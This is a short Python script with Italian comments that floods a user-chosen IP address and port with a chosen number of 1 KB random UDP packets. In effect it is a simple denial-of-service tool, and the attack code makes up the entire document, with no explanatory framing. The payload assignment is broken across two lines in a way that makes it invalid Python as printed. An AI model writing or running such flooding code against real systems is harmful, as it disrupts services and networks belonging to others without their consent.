

```
import socket
import random

# Indirizzo ip target e porta target
target_ip = input("indirizzo target IP: ")
target_port = int(input("indirizzo target porta: "))

# Quanti pacchetti vuoi mandare
num_packets = int(input("Quanti pacchetti vuoi inviare: "))

# Creo un UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# genero un 1KB di informazioni random
payload =
''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=1024))

# mandare le informazioni all' ip target e porta target
for i in range(num_packets):
    sock.sendto(payload.encode(), (target_ip, target_port))

# Chiudi il socket
sock.close()
```